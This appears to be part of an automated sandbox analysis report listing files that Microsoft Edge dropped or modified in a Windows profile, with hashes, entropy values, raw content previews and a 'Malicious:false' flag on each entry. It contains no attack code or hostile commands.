                                                                                                                                                                                                                                                                                                      MD5:160EFD34E55264174BEA94A7531AE60D
                                                                                                                                                                                                                                                                                                      SHA1:1C651215EE4F708990219E5C338D3F7574B12835
                                                                                                                                                                                                                                                                                                      SHA-256:1A7E3BCB6B7D6D98046B77810085133B19CD988997DFEB7184446E088ADA2070
                                                                                                                                                                                                                                                                                                      SHA-512:2F91E921B0B02C3ABDF229F3F0BB72DAB7AFE8FA702E4DCA141B19007C83826CA3E33E785F8D8F235A3FF7332DEF335149A7FE220113310883263BAC95AF9CD4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852496"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\503f8d49-1cb4-4964-bee4-7abec6c50337.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):46024
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.088146662969259
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:5MkbJrT8IeQc5daq/1KKGf4F4MiYUwQ1d1gcfhxPFDWBOCpsq9Cioc7DRo+yM/45:5Mk1rT8H1azYURduJOCaGFoc7VLyMV/s
                                                                                                                                                                                                                                                                                                      MD5:9419CAF415CAC48D5BCC18218E256384
                                                                                                                                                                                                                                                                                                      SHA1:69DB6C1AE88A21F8DAA25130F08BCEB596C4AE21
                                                                                                                                                                                                                                                                                                      SHA-256:86C95995F7F916C54291F35EE52D33F54B9BA7832F44DC118B8074E14F1E4375
                                                                                                                                                                                                                                                                                                      SHA-512:E63BBDD98B25776D6A72F016D78DD6F47CFAE81078097FD3069C0BE3DEA32BF7866665F45627CD1494A20D05ACE16B6AA12052F9800562D7ADF1F99BC6D05DC4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852496"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\55b887b8-227a-499e-a8c1-1c36250538bd.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):44818
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.097121620115022
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:5MkbJrT8IeQc5dajNKKGf4F4MiYUwQ1d1g0195oghfSCJuNPOCpsqh7DRo+yM/4E:5Mk1rT8H1aCYURdu01mOCaI7VLyMV/Ya
                                                                                                                                                                                                                                                                                                      MD5:DF323B9984920EC63CD08F15CF33DA15
                                                                                                                                                                                                                                                                                                      SHA1:6B8CFEB9F56CAB12E06F79A606CA8CF1A1E674D4
                                                                                                                                                                                                                                                                                                      SHA-256:6A98937AD14C4D558E357D418535D2148E56C809366AB76D023B0BF897FF5778
                                                                                                                                                                                                                                                                                                      SHA-512:87D162C6FFB63B3721095294187963EFE21485597F95C4876155759A2EE08045CD36A490557A5493048ED4D93BA8840E49C3052870C94E3FCD11C614FC6A1350
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852496"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\57edc9cd-1dc7-4080-b594-294989be613a.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44755
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.096038225601522
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xqUKKGf4F4MiYUwQ1d1gcfhxPFDWBN7DRo+yM/42cRn:z/Ps+wsI7yOGYURduJN7VLyMV/YoskFG
                                                                                                                                                                                                                                                                                                      MD5:7BD3628F82EF9B4E79000B2D41B54C6F
                                                                                                                                                                                                                                                                                                      SHA1:301B02FC1C6F3D72B116338F24744134AF660FBB
                                                                                                                                                                                                                                                                                                      SHA-256:2ADA0B3331F0867FAEEF767FF5BE2583DC658328DA347914D5F9D68C5A6B1DB5
                                                                                                                                                                                                                                                                                                      SHA-512:AE1250BAE6F5FBC732DEE07FD2466CDD7187C1F24D1CD08DF397B189D0B368D81CB0CA84B29E080CC458585C8982B1768D99D951C1BD9A8DB5702347C18A74BC
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\59805cd6-bea7-43c3-8f53-26644e44b574.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44699
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.09587818988589
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k/UKKGf4F4MiYUwQ1d1gCLMh0Q1PqFbN7DRo+yM/42e:z/Ps+wsI7yn1YURduypN7VLyMV/YoskU
                                                                                                                                                                                                                                                                                                      MD5:FA3AE2DD5D2E8551A57B8EE6A4A85365
                                                                                                                                                                                                                                                                                                      SHA1:4E3F2BF15813D3D7548024610AFED1B15A91C5DF
                                                                                                                                                                                                                                                                                                      SHA-256:9B98A31D548BD506B6A3E21C6859095C256CEA673569F4747CAAA68C787A345C
                                                                                                                                                                                                                                                                                                      SHA-512:F17FA8F719525A4B8F94DFE96D0A6605A9B37E05F198AA4E8FB8EC399DC8785DD7C1B74DB37EAB842EFB830A5C02F7690202491AAD5B65AF7B77DB52385CB4F9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8d3b47b9-4a89-406d-aed6-a4de3c58a357.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):44699
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.09587818988589
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k/UKKGf4F4MiYUwQ1d1gCLMh0Q1PqFbN7DRo+yM/42e:z/Ps+wsI7yn1YURduypN7VLyMV/YoskU
                                                                                                                                                                                                                                                                                                      MD5:FA3AE2DD5D2E8551A57B8EE6A4A85365
                                                                                                                                                                                                                                                                                                      SHA1:4E3F2BF15813D3D7548024610AFED1B15A91C5DF
                                                                                                                                                                                                                                                                                                      SHA-256:9B98A31D548BD506B6A3E21C6859095C256CEA673569F4747CAAA68C787A345C
                                                                                                                                                                                                                                                                                                      SHA-512:F17FA8F719525A4B8F94DFE96D0A6605A9B37E05F198AA4E8FB8EC399DC8785DD7C1B74DB37EAB842EFB830A5C02F7690202491AAD5B65AF7B77DB52385CB4F9
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                                                                                                                                                      MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                      SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                      SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                      SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3::
                                                                                                                                                                                                                                                                                                      MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                      SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                      SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                      SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67587D49-1C60.pma

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4446231615733768
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:A0PfeHM+ba8ysEWod9h9YPg1HF+B/Cz5RWpRxLzMYtBz+0LCTag1HFl:5feL/y1dX9YPaHO/0Ra/LYY+0GTaaHv
                                                                                                                                                                                                                                                                                                      MD5:6F8DBB255E30551287C269447A71E162
                                                                                                                                                                                                                                                                                                      SHA1:04F2F2D80C64EF2AFB24592732EA17FA61FA3416
                                                                                                                                                                                                                                                                                                      SHA-256:A0A33881C6FD50E85B40B7CC5761DD966D9B07A28050E8EE58360CE4429B2424
                                                                                                                                                                                                                                                                                                      SHA-512:A69D9CB4C2679AC027ACB7F2A357365AF7F0D7374E49CAC51F6FF9C434C32FE796EBAB6FEAC659F5449AEF48A0B4482938299A12C469CCE49DBC6A8BFB7466FF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...@..@...@.....C.].....@..................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".xxtgyr20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U?:K.u.$r.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.........5...... .2..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67587D49-1F14.pma

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.04097576056914179
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:Fg20m5tmTnOAUhYzJ/EdxeQR0JEYg7XqzIkVJEmY8RdhhIJNf9URQsA4VD:a20UtsZs1YbzhYnodVD
                                                                                                                                                                                                                                                                                                      MD5:447F896D6025AB1B501F0D3B2A41B096
                                                                                                                                                                                                                                                                                                      SHA1:6A306A3B91A659D1D1B2D2B6364C7C8AE8C8BC93
                                                                                                                                                                                                                                                                                                      SHA-256:FB0B318EEE98F48764386E1B6335F1651ED876AC30C8C457C0D2BF837FD72F35
                                                                                                                                                                                                                                                                                                      SHA-512:9E4D2DB5B35A79CA6C4772C92C44CBB324D6E2F1477660BFABAE15F635DD16256AD96BC6C07751AFD44B7B7DAF53043837BCF63C286668BBC2BE780E4E0B91F7
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...@..@...@.....C.].....@...............h[...Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".xxtgyr20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..Uu.$r.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. ...2...

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67589189-23D4.pma

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.045535601226861726
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:SN10pqtmOnOAMYzJxwasggLX7yIfVkDQMJ1hiVNLOe1gQt152qn8y08Tcm2RGOdB:k10ctx9KdN4huQKge5f08T2RGOD
                                                                                                                                                                                                                                                                                                      MD5:855D2E4D860C2B1FDCA915A213AA4187
                                                                                                                                                                                                                                                                                                      SHA1:93116822070C2849989D9461B4C5D4B6EF0C2FF6
                                                                                                                                                                                                                                                                                                      SHA-256:4489D1BE26DFED3C7DC7C2EBC6E3127ECBF3A3294E342EE16E40BECEA4B2F394
                                                                                                                                                                                                                                                                                                      SHA-512:32E3463B92C3121ABB34A90FA98D8BF63780EEB39603B6C61B130D3AED44171DE6C54BA530C33058666B6E06707F8A2ECA3D1A38BFE2E1611520C953761A4CD3
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...@..@...@.....C.].....@................f...V..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".xxtgyr20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..Uu.$r.>.........."....."...24.."."enTgffntZ7aEx+ciGbBGiyBrNZMmef8FF/v9xQCLNDA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.......,...... .`2.........5......

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):280
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.125589380871759
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:FiWWltlrPY+CflYMGjOXZYH0eXfl+BVP/Sh/Jzv/jSIHmsdJEU9VUnC:o1rPaf5ReXfl+BVsJDL7b/3U
                                                                                                                                                                                                                                                                                                      MD5:056187DBEE0D02F316D8AEDA2798853D
                                                                                                                                                                                                                                                                                                      SHA1:7BF2C2E344B7EFFE2B484F4863E295A830CA9811
                                                                                                                                                                                                                                                                                                      SHA-256:F3F5E27DD5AEBFBDDA70041186D1A21668B729C06BB8975C39CF886DB2F7C4A1
                                                                                                                                                                                                                                                                                                      SHA-512:63470C086FB204972069FD3103A2EBE7CC3A3CA04C5FAC0789AF0B3DC37DD1848B9E053F2CD2B548B8B062E8EF7B8BD980279BF8B866338E65EC928523C13C24
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:sdPC.....................!...W.F....+F."enTgffntZ7aEx+ciGbBGiyBrNZMmef8FF/v9xQCLNDA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0dc33db2-71fa-4b74-aa27-b35d016e8a2f.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
